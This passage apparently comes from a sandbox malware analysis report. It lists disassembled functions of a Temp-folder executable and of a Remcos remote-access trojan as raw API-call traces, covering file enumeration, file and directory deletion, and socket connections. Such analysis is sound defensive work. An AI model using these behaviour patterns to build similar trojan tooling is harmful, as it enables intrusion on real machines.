?$basic_string@DU?$char_traits@
D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char
_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
Source: C:\Users\user\AppData\Local\Temp\sm.exe Code function: 18_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Local\Temp\sm.exe Code function: 18_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 27_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 27_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 27_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 27_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 27_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 27_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2